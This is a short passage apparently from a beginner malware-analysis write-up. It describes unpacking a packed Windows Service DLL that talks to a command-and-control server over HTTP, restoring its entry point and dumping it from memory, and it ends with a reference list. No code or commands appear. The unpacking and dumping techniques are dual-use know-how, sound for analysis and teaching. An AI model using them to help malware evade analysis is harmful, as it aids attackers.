Import section of the unpacked binary

Some more of the import section which shows binary uses HTTP for communication with the C&C

We can see the registering of the service in ServiceMain function by calling RegisterServiceCtrlHandleWand SetServiceStatus, that means we can be sure it was indeed as Service Application.


We managed to unpack the Service Application DLL, this packer was specially designed DLLs was we observed the unpacking of the binary as then patching of the DllEntry point to the original code. It was not a special anti-debug technique used in unpacking which made it very trivial which good to learn for a beginner. We also learnt how to dump in-memory binary along the way.


  1. Creating Windows Service Application in C++
  2. Windows Service Application MSDN
  3. Debugging Remote Thread with EBFE technique